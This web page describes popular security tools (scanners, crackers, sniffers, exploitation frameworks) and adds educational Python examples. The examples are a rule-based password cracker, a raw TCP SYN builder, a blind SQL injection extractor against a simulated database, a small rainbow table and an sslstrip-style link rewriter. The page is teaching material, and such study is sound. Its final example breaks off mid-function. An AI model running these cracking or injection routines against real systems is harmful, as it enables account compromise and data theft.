Wireshark
(known as Ethereal until a trademark dispute in summer 2006) is a fantastic
open source multi-platform network protocol analyzer. It allows you to examine
data from a live network or from a capture file on disk. You can interactively
browse the capture data, delving down into just the level of packet detail you
need.
Metasploit
Metasploit took the security world by storm when
it was released in 2004. It is an advanced open-source platform for developing,
testing, and using exploit code. The extensible model through which payloads,
encoders, no-op generators, and exploits can be integrated has made it possible
to use the Metasploit Framework as an outlet for cutting-edge exploitation
research.
Nessus
Nessus is one of the most popular and capable
vulnerability scanners, particularly for UNIX systems. It was initially free
and open source when released, but the code was closed in 2005 and it is now a
commercial product, although its pricing still beats many of its competitors. A
free "Home Feed" is also available, though it is limited and only licensed for
home network use.
Aircrack
Aircrack is a suite of tools for 802.11a/b/g WEP
and WPA cracking. It implements the best known cracking algorithms to recover
wireless keys once enough encrypted packets have been gathered. The suite
comprises over a dozen discrete tools, including airodump (an 802.11 packet capture
program), aireplay (an 802.11 packet injection program), aircrack (static WEP
and WPA-PSK cracking), and airdecap (decryption of WEP/WPA capture files).
Snort
This network intrusion detection and prevention
system excels at traffic analysis and packet logging on IP networks. Through
protocol analysis, content searching, and various pre-processors, Snort detects
thousands of worms, vulnerability exploit attempts, port scans, and other
suspicious behavior.
Cain and Abel
UNIX users often smugly assert that the best free
security tools support their platform first, and Windows ports are often an
afterthought. They are usually right, but Cain & Abel is a glaring
exception. This Windows-only password recovery tool handles an enormous variety
of tasks. It can recover passwords by sniffing the network, cracking encrypted
passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, revealing password boxes,
uncovering cached passwords and analyzing routing protocols.
BackTrack
This excellent bootable live CD Linux
distribution comes from the merger of Whax and Auditor. It boasts a huge
variety of Security and Forensics tools and provides a rich development
environment. User modularity is emphasized so the distribution can be easily
customized by the user to include personal scripts, additional tools,
customized kernels, etc. BackTrack has since been succeeded by Kali Linux.
Netcat
The original Netcat was released by Hobbit in 1995. This simple utility reads and
writes data across TCP or UDP network connections. It is designed to be a
reliable back-end tool that can be used directly or easily driven by other programs and
scripts. At the same time, it is a feature-rich network debugging and
exploration tool, since it can create almost any kind of connection you would
need, including binding to a port to accept incoming connections.
tcpdump
Tcpdump is the network sniffer we all used before
Wireshark came on the scene, and many of us continue to use it frequently. It
may not have the bells and whistles (such as a pretty GUI and parsing logic for
hundreds of application protocols) that Wireshark has, but it does the job well
and with fewer security risks. It also requires fewer system resources.
John the Ripper
John the Ripper is a fast password cracker for
UNIX/Linux and Mac OS X. Its primary purpose is to detect weak UNIX
passwords, though it supports hashes for many other platforms as well. There is
an official free version, a community-enhanced version (with many contributed
patches but not as much quality assurance), and an inexpensive pro version.
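Wordlist-plus-rules cracking of the kind John performs, as an added example that is not part of the original page or of John the Ripper's code. The hash scheme is a constructed salted SHA-256 written as `$demo$salt$hex` (not a real crypt(3) format, and far faster than md5crypt, sha512crypt or bcrypt), and the shadow lines and wordlist are made up. It shows why mangling rules matter and why a per-user salt forces the attacker to hash every candidate once per user instead of once overall.

```python
import hashlib
import itertools

# Constructed hash format for the demo: "$demo$<salt>$<sha256(salt || password) hex>".
def demo_hash(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode()).hexdigest()

def make_shadow(users):
    """Build constructed shadow-style lines from (user, salt, plaintext) tuples."""
    return [f"{u}:$demo${s}${demo_hash(s, p)}" for u, s, p in users]

def parse_shadow(line: str):
    user, field = line.split(":", 1)
    _, scheme, salt, digest = field.split("$")
    if scheme != "demo":
        raise ValueError(f"unsupported hash type for {user}")
    return user, salt, digest

# --- mangling rules, in the spirit of John's rule engine -------------------
CASE_RULES = [lambda w: w, lambda w: w.capitalize(), lambda w: w.upper()]
LEET_RULES = [lambda w: w, lambda w: w.translate(str.maketrans("aeo", "430"))]
SUFFIXES = [""] + [str(d) for d in range(10)] + ["!", "123", "2024"]

def candidates(wordlist):
    """Yield every word under every combination of rules, without duplicates."""
    seen = set()
    for word, case, leet, suffix in itertools.product(wordlist, CASE_RULES, LEET_RULES, SUFFIXES):
        cand = leet(case(word)) + suffix
        if cand not in seen:
            seen.add(cand)
            yield cand

def crack(shadow_lines, wordlist):
    """Try each candidate against every still-uncracked hash. Because every user
    has a distinct salt, each candidate must be hashed once per user: salting
    multiplies the attacker's work and kills shared precomputation."""
    entries = [parse_shadow(line) for line in shadow_lines]
    cracked, hashes_computed = {}, 0
    for cand in candidates(wordlist):
        for user, salt, digest in entries:
            if user in cracked:
                continue
            hashes_computed += 1
            if demo_hash(salt, cand) == digest:
                cracked[user] = cand
        if len(cracked) == len(entries):
            break
    return cracked, hashes_computed

# Constructed sample data: four users, three with rule-derived passwords.
SHADOW = make_shadow([
    ("alice", "x9Qm", "password"),
    ("bob",   "T7pL", "Dragon1"),
    ("carol", "Z2ka", "s3cr3t!"),
    ("dave",  "Hh01", "correct horse battery staple"),  # not derivable; survives
])
WORDLIST = ["password", "dragon", "secret", "letmein", "welcome", "monkey"]

if __name__ == "__main__":
    found, n = crack(SHADOW, WORDLIST)
    print(f"{len(found)}/{len(SHADOW)} cracked after {n} hash computations: {found}")
```

The `hashes_computed` counter is the point to watch: with unsalted hashes (LM, NTLM, raw MD5) one hash per candidate would test every user at once, and precomputed tables become possible.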
Kismet
Kismet is a console (ncurses) based 802.11
layer-2 wireless network detector, sniffer, and intrusion detection system. It
identifies networks by passively sniffing (as opposed to more active tools such
as NetStumbler), and can even decloak hidden (non-beaconing) networks if they
are in use. It can automatically detect network IP blocks by sniffing TCP, UDP,
ARP, and DHCP packets, and log traffic in a Wireshark/tcpdump-compatible format.
OpenSSH/PuTTY/SSH
SSH (Secure Shell) is the now ubiquitous program
for logging into or executing commands on a remote machine. It provides secure
encrypted communications between two untrusted hosts over an insecure network,
replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX
users run the open source OpenSSH server
and client. Windows users often prefer the free PuTTY client, which is also available
for many mobile devices. Remember that SSH authenticates the server only through
its host key, so verify the key fingerprint on first connection instead of
blindly accepting it.
Burp Suite
Burp Suite is an integrated platform for
attacking web applications. It contains a variety of tools with numerous
interfaces between them designed to facilitate and speed up the process of
attacking an application. All of the tools share the same framework for
handling and displaying HTTP messages, persistence, authentication, proxies,
logging, alerting and extensibility.
Nikto
Nikto is an Open Source (GPL) web server scanner
which performs comprehensive tests against web servers for multiple items,
including over 6400 potentially dangerous files/CGIs, checks for outdated
versions of over 1200 servers, and version specific problems on over 270
servers. It also checks for server configuration items such as the presence of
multiple index files, HTTP server options, and will attempt to identify
installed web servers and software. Scan items and plugins are frequently
updated and can be automatically updated.
Hping
This handy little utility assembles and sends
custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired
by the ping command, but offers far more control over the probes sent. It also
has a handy traceroute mode and supports IP fragmentation. Hping is
particularly useful when trying to traceroute/ping/probe hosts behind a
firewall that blocks attempts using the standard utilities. This often allows
you to map out firewall rule sets. It is also great for learning more about
TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been
updated since 2005. The Nmap Project created and maintains Nping, which covers
similar ground.
Ettercap
Ettercap is a suite for man in the middle attacks
on LAN. It features sniffing of live connections, content filtering on the fly
and many other interesting tricks. It supports active and passive dissection of
many protocols (even ciphered ones) and includes many features for network and
host analysis.
Sysinternals
Sysinternals provides many small Windows
utilities that are quite useful for low-level Windows hacking. Some are free of
cost and/or include source code, while others are proprietary. Survey
respondents were most enamored with:
- Process Explorer for keeping an eye on the files and directories open by any process (like lsof on UNIX).
- PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
- Autoruns for discovering what executables are set to run during system boot up or login.
- RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
- TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
W3AF
W3af is an extremely popular, powerful, and
flexible framework for finding and exploiting web application vulnerabilities.
It is easy to use and extend and features dozens of web assessment and
exploitation plugins. In some ways it is like a web-focused Metasploit.
OpenVAS
OpenVAS is a vulnerability scanner that was
forked from the last free version of Nessus after
that tool went proprietary in 2005. OpenVAS plugins are still written in the
Nessus NASL language. The project seemed dead for a while, but development has
since restarted.
Scapy
Scapy is a powerful interactive packet
manipulation tool, packet generator, network scanner, network discovery tool,
and packet sniffer. Note that Scapy is a very low-level tool—you interact with
it using the Python programming language. It provides classes to interactively
create packets or sets of packets, manipulate them, send them over the wire,
sniff other packets from the wire, and match requests with their answers. Sending
and sniffing raw packets require root (or CAP_NET_RAW on Linux).
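What Scapy does for you when you build `IP(dst=...)/TCP(dport=80, flags="S")` and send it, as an added example written for this page (not Scapy's own code): a pure-Python builder for an IPv4/TCP SYN with correct header and pseudo-header checksums, plus verifiers that recompute them. Addresses and ports are made up, and `send_raw` is only called under `__main__` because raw sockets need root.

```python
import socket
import struct

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src: str, dst: str, payload: bytes, proto: int = 6,
               ttl: int = 64, ident: int = 0x1234) -> bytes:
    """20-byte IPv4 header (DF set, no options) plus payload, checksum filled in."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0x4000,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + payload

def build_tcp_syn(src: str, dst: str, sport: int, dport: int, seq: int = 0,
                  window: int = 65535, mss: int = 1460) -> bytes:
    """TCP SYN with an MSS option. The checksum also covers a pseudo-header of
    IP addresses, protocol and segment length, which is why src/dst are needed."""
    options = struct.pack("!BBH", 2, 4, mss)          # kind 2 = MSS, length 4
    doff = (20 + len(options)) // 4
    seg = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, doff << 4, 0x02,
                      window, 0, 0) + options
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(seg))
    return seg[:16] + struct.pack("!H", inet_checksum(pseudo + seg)) + seg[18:]

def craft_syn(src: str, dst: str, sport: int, dport: int) -> bytes:
    return build_ipv4(src, dst, build_tcp_syn(src, dst, sport, dport))

def verify_ipv4(pkt: bytes) -> bool:
    """With a correct checksum the one's-complement sum of the header is zero."""
    ihl = (pkt[0] & 0x0F) * 4
    return inet_checksum(pkt[:ihl]) == 0

def verify_tcp(pkt: bytes) -> bool:
    ihl = (pkt[0] & 0x0F) * 4
    seg = pkt[ihl:struct.unpack_from("!H", pkt, 2)[0]]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(seg))
    return inet_checksum(pseudo + seg) == 0

def send_raw(pkt: bytes, dst: str) -> None:
    """Hand the finished datagram to the kernel as-is (needs root / CAP_NET_RAW)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(pkt, (dst, 0))

if __name__ == "__main__":
    pkt = craft_syn("10.0.0.1", "10.0.0.2", 40000, 80)   # made-up addresses
    print(pkt.hex(), verify_ipv4(pkt), verify_tcp(pkt))
```

A receiving stack silently drops a segment whose checksum fails, which is the usual reason a hand-crafted probe "does nothing"; the verifiers above are the first thing to run before blaming a firewall.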
Ping/telnet/dig/traceroute/whois/netstat
While there are many advanced high-tech tools out
there to assist in security auditing, don't forget about the basics! Everyone
should be very familiar with these tools as they come with most operating
systems (except that Windows omits whois and uses the name tracert). They can
be very handy in a pinch, although more advanced functionality is available
from Hping and Netcat.
THC Hydra
When you need to brute-force
a remote authentication service, Hydra is often the tool of choice.
It can perform rapid dictionary attacks against more than 30 protocols,
including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap, this release is from the fine
folks at THC.
Perl/Python/Ruby
While many canned security tools are available on
this site for handling common tasks, scripting languages allow you to write
your own (or modify existing ones) when you need something more custom. Quick,
portable scripts can test, exploit, or even fix systems. Archives like CPAN are
filled with modules such as Net::RAWIP and protocol implementations to make
your tasks even easier. Many security tools use scripting languages heavily for
extensibility.
Paros proxy
A Java-based web proxy for assessing web
application vulnerabilities. It supports editing/viewing HTTP/HTTPS messages
on-the-fly to change items such as cookies and form fields. It includes a web
traffic recorder, web spider, hash calculator, and a scanner for testing common
web application attacks such as SQL injection and cross-site scripting.
NetStumbler
NetStumbler is the best known Windows tool for
finding open wireless access points ("wardriving"). They also
distribute a WinCE version for PDAs and such named MiniStumbler.
The tool is currently free but Windows-only and no source code is provided. It
uses a more active approach to finding WAPs than passive sniffers such as
Kismet or KisMAC.
Google
While
it is far more than a security tool, Google's massive database is a gold mine
for security researchers and penetration testers. You can use it to dig up
information about a target company by using operators such as "site:target-domain.com"
and find employee names, sensitive information that they wrongly thought was
hidden, vulnerable software installations, and more. Similarly, when a bug is
found in yet another popular webapp, Google can often provide a list of
vulnerable servers worldwide within seconds. Check out the Google Hacking
Database and Johnny Long's excellent book on Google hacking.
OSSEC
OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based
alerting and active response. In addition to its IDS functionality, it is
commonly used as a SEM/SIM solution. Because of its powerful log analysis
engine, ISPs, universities and data centers are running OSSEC HIDS to monitor
and analyze their firewalls, IDSs, web servers and authentication logs.
WebScarab
In
its simplest form, WebScarab records the conversations (requests and responses)
that it observes, and allows the operator to review them in various ways.
WebScarab is designed to be a tool for anyone who needs to expose the workings
of an HTTP(S) based application, whether to allow the developer to debug
otherwise difficult problems, or to allow a security specialist to identify
vulnerabilities in the way that the application has been designed or
implemented.
Core
Impact isn't cheap (be prepared to spend at least $30,000), but it is widely
considered to be the most powerful exploitation tool available. It sports a
large, regularly updated database of professional exploits, and can do neat
tricks like exploiting one machine and then establishing an encrypted tunnel
through that machine to reach and exploit other boxes.
sqlmap
is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over back-end
database servers. It comes with a broad range of features, from database
fingerprinting to fetching data from the DB and even accessing the underlying
file system and executing OS commands via out-of-band connections.
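The boolean-based blind technique that sqlmap automates, as an added example that is not part of sqlmap or of the original page. An in-memory SQLite database and a simulated endpoint stand in for the web application: `vulnerable_page` concatenates its parameter into SQL and reveals only whether a row came back, `blind_extract` recovers a column value from nothing but those yes/no answers, and the parameterized `safe_page` shows the same payloads going inert. Table, users and hash values are constructed.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed backend: a users table with made-up password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    db.executemany("INSERT INTO users (name, pw_hash) VALUES (?, ?)", [
        ("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),
        ("bob", "d8578edf8458ce06fbc5bb76a58c5ca4"),
    ])
    return db

def vulnerable_page(db, user_id: str) -> bool:
    """Simulated endpoint with the bug: the parameter is concatenated into SQL.
    It leaks only one bit (did a row come back?), which is all blind SQLi needs."""
    try:
        row = db.execute("SELECT name FROM users WHERE id = " + user_id).fetchone()
    except sqlite3.Error:
        return False
    return row is not None

def safe_page(db, user_id: str) -> bool:
    """Same endpoint, parameterized: the value is bound, never parsed as SQL."""
    try:
        row = db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    except sqlite3.Error:
        return False
    return row is not None

def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the string returned by `subquery` using only true/false answers:
    the length first (binary search), then each character seven bits at a time."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    chars = []
    for pos in range(1, lo + 1):
        code = 0
        for bit in range(7):
            if oracle(f"(unicode(substr(({subquery}),{pos},1)) & {1 << bit}) > 0"):
                code |= 1 << bit
        chars.append(chr(code))
    return "".join(chars)

def attack(page, db, subquery: str):
    """Drive the oracle through the page; returns (extracted value, requests used)."""
    requests = 0
    def oracle(condition: str) -> bool:
        nonlocal requests
        requests += 1
        return page(db, "1 AND " + condition)   # id=1 exists, so the answer == condition
    return blind_extract(oracle, subquery), requests

TARGET = "SELECT pw_hash FROM users WHERE name = 'alice'"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", attack(vulnerable_page, db, TARGET))
    print("parameterized:", attack(safe_page, db, TARGET))
```

Against the vulnerable endpoint the 32-character hash comes back after a few hundred requests; against the parameterized one every condition is bound as a literal string, the oracle never says yes, and the extracted value is empty. Real sqlmap adds error-, time- and union-based techniques on top of this same loop.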
TrueCrypt
is an excellent open source disk encryption system for Windows, Mac, and Linux
systems. Users can encrypt entire file systems, which are then on-the-fly
encrypted/decrypted as needed without user intervention beyond initially
entering their passphrase. A clever hidden volume feature allows you
to hide a second layer of particularly sensitive content with plausible
deniability about whether it even exists. Note that TrueCrypt's developers
abandoned it in 2014; the VeraCrypt fork continues the code base.
dsniff
This
popular and well-engineered suite by Dug Song includes many tools: dsniff,
filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a
network for interesting data (passwords, e-mail, files, etc.); arpspoof, dnsspoof,
and macof facilitate the interception of network traffic normally unavailable
to an attacker (e.g., due to layer-2 switching); and sshmitm and webmitm
implement active monkey-in-the-middle attacks against redirected ssh and https
sessions by exploiting weak bindings in ad-hoc PKI.
IDA Pro
Disassembly
is a big part of security research. It will help you dissect that Microsoft
patch to discover the silently fixed bugs they don't tell you about, or more
closely examine a server binary to determine why your exploit isn't working.
Many disassemblers and debuggers are available, but IDA Pro has become the de-facto standard for
the analysis of hostile code and vulnerability research. This interactive,
programmable, extensible, multi-processor disassembler has a graphical
interface on Windows and console interfaces on Linux.
Maltego
is a forensics and data mining application. It is capable of querying various
public data sources and graphically depicting the relationships between
entities such as people, companies, web sites, and documents.
Ophcrack
is a free rainbow-table based cracker for Windows passwords (though the tool
itself runs on Linux, Windows, and Mac). Features include LM and NTLM hash
cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a
Windows partition, and a Live CD version.
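A miniature rainbow table, added here to show the time-memory trade-off behind Ophcrack; it is illustrative code written for this page, not Ophcrack's. The password space is four lowercase letters, a truncated MD5 stands in for the unsalted LM/NTLM hashes the real tables target, and chain count and length are tiny so the build runs in well under a second. Precisely because the hash is unsalted, one table serves every hash; a per-user salt would demand a table per salt value, which is why salted formats are not attacked this way.

```python
import hashlib

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 4
SPACE = len(ALPHABET) ** PW_LEN      # 456,976 possible passwords
CHAIN_LEN = 50                       # t: hash/reduce steps per chain
N_CHAINS = 3000                      # m: chains stored (covers a fraction of SPACE)

def H(pw: str) -> int:
    """Stand-in for an unsalted password hash (truncated MD5 as an integer)."""
    return int.from_bytes(hashlib.md5(pw.encode()).digest()[:8], "big")

def index_to_pw(i: int) -> str:
    out = []
    for _ in range(PW_LEN):
        out.append(ALPHABET[i % len(ALPHABET)])
        i //= len(ALPHABET)
    return "".join(out)

def R(h: int, col: int) -> str:
    """Column-dependent reduction function: maps a hash back into the password
    space. A different R per column is what makes the table 'rainbow' and keeps
    chains from merging as badly as in Hellman's original scheme."""
    return index_to_pw((h + col) % SPACE)

def chain_point(start: str, k: int) -> str:
    """The k-th password on the chain that begins at `start` (k=0 is start)."""
    pw = start
    for col in range(k):
        pw = R(H(pw), col)
    return pw

def build_table() -> dict:
    """Precomputation: store only endpoint -> starts; the middle is recomputed."""
    table = {}
    for n in range(N_CHAINS):
        start = index_to_pw((n * 104729) % SPACE)   # spread starts over the space
        table.setdefault(chain_point(start, CHAIN_LEN), []).append(start)
    return table

def crack(table: dict, target: int):
    """Lookup: assume the target sits at column k, walk to the chain end, and if
    that end is stored, regenerate the chain from its start to confirm. Hash
    collisions cause false alarms, so the final check against `target` matters."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        pw = R(target, k)
        for col in range(k + 1, CHAIN_LEN):
            pw = R(H(pw), col)
        for start in table.get(pw, ()):
            candidate = chain_point(start, k)
            if H(candidate) == target:
                return candidate
    return None   # not covered by this (deliberately small) table

if __name__ == "__main__":
    table = build_table()
    covered = chain_point(index_to_pw(0), 3)    # lies on a stored chain by construction
    print(covered, "->", crack(table, H(covered)))
    print("zzzz ->", crack(table, H("zzzz")))    # usually None: partial coverage
```

Storage is m endpoints instead of the whole space, and a lookup costs about t squared over two hash operations; real tables pick m and t so that coverage of the LM space is near-complete while the table still fits on a disk.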
Rapid7
Nexpose is a vulnerability scanner which aims to support the entire
vulnerability management lifecycle, including discovery, detection,
verification, risk classification, impact analysis, reporting and mitigation.
It integrates with Rapid7's Metasploit for vulnerability exploitation. It
is sold as standalone software, an appliance, virtual machine, or as a managed
service or private cloud deployment. User interaction is through a web browser.
Netfilter
is a powerful packet filter implemented in the standard Linux kernel. The
userspace iptables tool is used for configuration (newer kernels have since
moved to nftables and its nft utility). It supports packet filtering
(stateless or stateful), all kinds of network address and port translation
(NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many
different modules for handling unruly protocols such as FTP.
PGP
is the famous encryption system originally written by Phil Zimmermann which
helps secure your data from eavesdroppers and other risks. GnuPG is a very
well-regarded open source implementation of the PGP standard (the actual
executable is named gpg). While the excellent GnuPG is always free, PGP is now
owned by Symantec and costs a lot of money.
skipfish
skipfish is an active web application security
reconnaissance tool. It prepares an interactive sitemap for the targeted site
by carrying out a recursive crawl and dictionary-based probes. The resulting
map is then annotated with the output from a number of active (but hopefully
non-disruptive) security checks. The final report generated by the tool is
meant to serve as a foundation for professional web application security
assessments.
GFI
LanGuard is a network security and vulnerability scanner designed to help with
patch management, network and software audits, and vulnerability assessments.
The price is based on the number of IP addresses you wish to scan. A free trial
version (up to 5 IP addresses) is available.
Acunetix
WVS (web vulnerability scanner) automatically checks web applications for
vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion,
and weak password strength on authentication pages. It boasts a comfortable
GUI, an ability to create professional security audit and compliance reports,
and tools for advanced manual webapp testing.
QualysGuard
is a popular SaaS (software as a service) vulnerability management offering.
Its web-based UI offers network discovery and mapping, asset prioritization,
vulnerability assessment reporting and remediation tracking according to
business risk. Internal scans are handled by Qualys appliances which
communicate back to the cloud-based system.
VMware
virtualization software lets you run one operating system within another. This
is quite useful for security researchers who commonly need to test code,
exploits, etc. on multiple platforms. Workstation and Player run on Windows and
Linux hosts (Fusion covers macOS), but pretty much any x86 or x86_64 OS will run
inside the virtualized environment. It is also useful for setting up sandboxes.
You can browse from within a VMware window so that even if you are infected
with malware, it cannot reach your host OS, barring a hypervisor escape bug. And
recovering the guest OS is as simple as loading a "snapshot"
from prior to the infection. VMware Player (executes, but can't create OS
images) and VMware Server (partitions a physical server machine into
multiple virtual machines) have been released free of charge.
OllyDbg
is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis
on binary code analysis makes it particularly useful in cases where source is
unavailable. OllyDbg features an intuitive user interface, advanced code analysis
capable of recognizing procedures, loops, API calls, switches, tables,
constants and strings, an ability to attach to a running program, and good
multi-thread support. OllyDbg is free to download and use but no source code is
provided.
Ntop
shows network usage in a way similar to what top does for processes. In
interactive mode, it displays the network status on the user's terminal. In Web
mode, it acts as a Web server, creating an HTML dump of the network status. It
sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for
creating ntop-centric monitoring applications, and RRD for persistently storing
traffic statistics.
Microsoft
Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT
professional that helps small and medium-sized businesses determine their
security state in accordance with Microsoft security recommendations and offers
specific remediation guidance. Built on the Windows Update Agent and Microsoft
Update infrastructure, MBSA ensures consistency with other Microsoft management
products including Microsoft Update (MU), Windows Server Update Services
(WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM).
Apparently MBSA on average scans over 3 million computers each week.
AppScan
provides security testing throughout the application development lifecycle,
easing unit testing and security assurance early in the development phase.
Appscan scans for many common vulnerabilities, such as cross site scripting,
HTTP response splitting, parameter tampering, hidden field manipulation,
backdoors/debug options, buffer overflows and more. AppScan was merged into
IBM's Rational division after IBM purchased its original developer (Watchfire)
in 2007.
Alienvault
OSSIM stands for Open Source Security Information Management. Its goal is to
provide a comprehensive compilation of tools which, when working together,
grant network/security administrators with a detailed view over each and every
aspect of networks, hosts, physical access devices, and servers.
Medusa
is intended to be a speedy, massively parallel, modular, login brute-forcer. It
supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion,
and VNC to name a few. Other online crackers are THC Hydra and Ncrack.
OpenSSL
The
OpenSSL Project is a collaborative effort to develop a robust, commercial-grade,
full-featured, and open source toolkit implementing the Secure Sockets Layer
(SSL) and Transport Layer Security (TLS) protocols as well as a
full-strength general purpose cryptography library. Apart from being a
component of many crypto programs, OpenSSL comes with a lot of command-line
tools for encryption, hashing, certificate handling, and more.
Canvas
is a commercial vulnerability exploitation tool from Dave Aitel's ImmunitySec. It includes more than 370 exploits and is less expensive
than Core
Impact or the commercial versions
of Metasploit. It comes with full source code, and occasionally even
includes zero-day exploits.
fgdump
is a newer version of the pwdump tool for extracting NTLM and LanMan password hashes
from Windows. It is also capable of displaying password histories if they are
available. It outputs the data in L0phtCrack-compatible form, and can write to an output file. fgdump
attempts to disable antivirus software before running. It then runs pwdump,
cachedump (cached credentials dump), and pstgdump (protected storage
dump).
Tor
is a network of virtual tunnels designed to improve privacy and security on the
Internet by routing your requests through a series of intermediate machines. It
uses a normal proxy server interface so that ordinary Internet applications
like web browsers and chat programs can be configured to use it. In addition to
helping preserve users' anonymity, Tor can help evade firewall restrictions.
Tor's hidden services (now called onion services) allow users to publish web
sites and other services without
revealing their identity or location. For a free cross-platform GUI, users
recommend Vidalia (since replaced by Tor Browser, which bundles Tor with a
hardened Firefox). Remember that Tor exit nodes are sometimes run by malicious
parties and can sniff your traffic, so avoid authenticating using insecure
network protocols (such as non-SSL web sites and mail servers). That is always
dangerous, but particularly bad when routing through Tor.
Retina
Like Nessus, Retina's function is to scan all the hosts on a network
and report on any vulnerabilities found. It was written by eEye, who are
well known for their security research.
Firefox
is a web browser, a descendant of Mozilla. It emerged as a serious competitor
to Internet Explorer, with improved security as one of its features. While
Firefox no longer has a stellar security record, security professionals still
appreciate it for its wide selection of security-related add-ons,
including Tamper Data, Firebug, and NoScript.
OpenVPN
is an open-source SSL VPN package which can accommodate a wide range of
configurations, including remote access, site-to-site VPNs, WiFi security, and
enterprise-scale remote access solutions with load balancing, failover, and
fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure
network extension using the industry standard SSL/TLS protocol, supports
flexible client authentication methods based on certificates, smart cards,
and/or 2-factor authentication, and allows user or group-specific access
control policies using firewall rules applied to the VPN virtual interface.
L0phtCrack
attempts to crack Windows passwords from hashes which it can obtain (given
proper access) from stand-alone Windows workstations, networked servers,
primary domain controllers, or Active Directory. In some cases it can sniff the
hashes off the wire. It also has numerous methods of generating password
guesses (dictionary, brute force, etc).
The
Social Engineer Toolkit incorporates many useful social-engineering attacks all
in one interface. The main purpose of SET is to automate and improve on many of
the social-engineering attacks out there. It can automatically generate
exploit-hiding web pages or email messages, and can use Metasploit payloads to,
for example, connect back with a shell once the page is opened.
Yersinia
is a low-level protocol attack tool useful for penetration testing. It is
capable of many diverse attacks over multiple protocols, such as becoming the
root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP
(Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot
Standby Router Protocol) scenario, faking DHCP replies, and other low-level
attacks.
Fiddler
is a Web Debugging Proxy which logs all HTTP(S) traffic between your computer
and the Internet. Fiddler allows you to inspect all HTTP(S) traffic, set
breakpoints, and "fiddle" with incoming or outgoing data. Fiddler
includes a powerful event-based scripting subsystem, and can be extended using
any .NET language.
sslstrip
is an SSL stripping proxy, designed to make unencrypted HTTP sessions look as
much as possible like HTTPS sessions. It converts https links to http or to
https with a known private key. It even provides a padlock favicon for the
illusion of a secure channel. Many HTTPS sites are normally accessed from a
redirect on an HTTP page, and many users don't notice when their connection
isn't upgraded.
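The rewrite sslstrip performs on a response, next to the check a modern browser applies before any plaintext request, as an added example written for this page (not sslstrip's code). The HTML and header values are constructed; `HstsPolicy` implements the max-age and includeSubDomains semantics of the Strict-Transport-Security header, and `attack_succeeds` asks whether a stripped link would actually go out unencrypted.

```python
import re

def strip_https(html: str):
    """sslstrip's core trick: downgrade every https:// URL in a page to http://
    and remember which ones changed so the proxy can re-upgrade them on the way
    to the real server. Returns (rewritten page, {stripped_url: original_url})."""
    mapping = {}
    def swap(m):
        original = m.group(0)
        stripped = "http://" + original[len("https://"):]
        mapping[stripped] = original
        return stripped
    return re.sub(r"https://[^\s\"'<>]+", swap, html), mapping

class HstsPolicy:
    """Minimal Strict-Transport-Security cache: host -> (expiry, include_subdomains)."""
    def __init__(self, preload=()):
        self.entries = {h: (float("inf"), True) for h in preload}

    def learn(self, host: str, header_value: str, now: float) -> None:
        """Record an STS header the browser saw over a *valid* HTTPS connection
        (browsers ignore the header on plaintext responses, so sslstrip cannot
        inject one that helps it)."""
        directives = [d.strip().lower() for d in header_value.split(";")]
        max_age = None
        for d in directives:
            if d.startswith("max-age="):
                max_age = int(d.split("=", 1)[1].strip('"'))
        if max_age is None:
            return                                   # invalid header: ignored
        if max_age == 0:
            self.entries.pop(host, None)             # max-age=0 clears the entry
            return
        self.entries[host] = (now + max_age, "includesubdomains" in directives)

    def must_use_https(self, host: str, now: float) -> bool:
        """True if the browser rewrites http://host/... to https before sending."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self.entries.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry <= now:
                continue
            if i == 0 or include_sub:
                return True
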